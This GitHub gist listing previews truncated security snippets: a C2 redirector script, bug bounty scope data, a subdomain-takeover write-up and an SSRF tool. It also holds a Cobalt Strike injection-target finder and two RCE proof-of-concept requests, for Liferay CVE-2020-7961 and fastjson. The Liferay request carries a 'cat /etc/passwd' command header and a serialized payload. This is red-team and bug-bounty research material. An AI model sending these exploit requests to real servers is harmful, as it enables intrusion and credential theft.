Skip to content

Instantly share code, notes, and snippets.

View udpsec's full-sized avatar
💭
I may be slow to respond.

Abell udpsec

💭
I may be slow to respond.
175 followers · 282 following
View GitHub Profile
@mhaskar
mhaskar / Automated-Redirectors.py
Last active February 17, 2024 16:48
Python script to create HTTPS redirectors that pointing to your C2
#!/usr/bin/python
import requests
import json
import time
import paramiko
from Crypto.PublicKey import RSA
from os import chmod
public_key_name = "test1.key"
@0xtavi
0xtavi / bounty_wildcards.json
Created March 11, 2021 14:50
Bug Bounty Paying Programs Wildcard Domains
{
"programs": [
{
"name": "spacex",
"url": "https://bugcrowd.com/spacex",
"wildcards": [
"starlink.com",
"starlinkisp.net"
],
"out_of_scope_domains": [],
@TheBinitGhimire
TheBinitGhimire / README.md
Last active October 27, 2024 19:26
Dangling DNS Records leading to Sub-domain Takeover on api.techprep.fb.com!

Dangling DNS Records on api.techprep.fb.com - $500!

Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk

I have included my script in another file (main.sh), which I used in discovering this vulnerability.

I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.

I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.

@pikpikcu
pikpikcu / LiferayRCE(CVE-2020-7961).md
Last active September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961) 
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
@pikpikcu
pikpikcu / fastjson.md
Last active September 7, 2024 18:51
fastjson rce

fastjson ver:1.2.24

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json
@nullenc0de
nullenc0de / breach.sh
Created January 27, 2021 15:06
Script will look up company assets and search them on greynoise.
cat cust.txt |assetfinder -subs-only | filter-resolved -c 100 | while read resolved; do host -t A "$resolved" | awk '{print $NF}' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'; done |sort -u |while read ip; do greynoise quick $ip ; done |grep -v "NOT" |cut -d ' ' -f1 |greynoise ip |sed -e '/malicious/,/rDNS/!d'
@h4ms1k
h4ms1k / asyncio_ssrf.py
Last active August 7, 2022 01:09
#https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/ssrf.py
import aiohttp
import asyncio
import urllib3
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
injectable_headers = [
@byt3bl33d3r
byt3bl33d3r / encrypt_decrypt.nim
Last active March 23, 2025 23:16
Nim AES256 Encryption/Decryption
#[
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: BSD 3-Clause
AES256-CTR Encryption/Decryption
]#
import nimcrypto
import nimcrypto/sysrand
@G0ldenGunSec
G0ldenGunSec / EnumCLR.c
Last active April 5, 2025 15:38
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
@yihong0618
yihong0618 / shanbay_remember.js
Last active January 8, 2025 13:27
扇贝加密破解自动发送今日新词到 telegram
const https = require("https");
const token = ""; // change this to you telegram bot token!
const chatId = ""; // change this to your telegram chat id!
const cookie = ""; // change this to your shanbay cookie!
const PATH_API = (page) =>
`/wordsapp/user_material_books/blozps/learning/words/today_learning_items?ipp=10&page=${page}&type_of=NEW`;
const options = {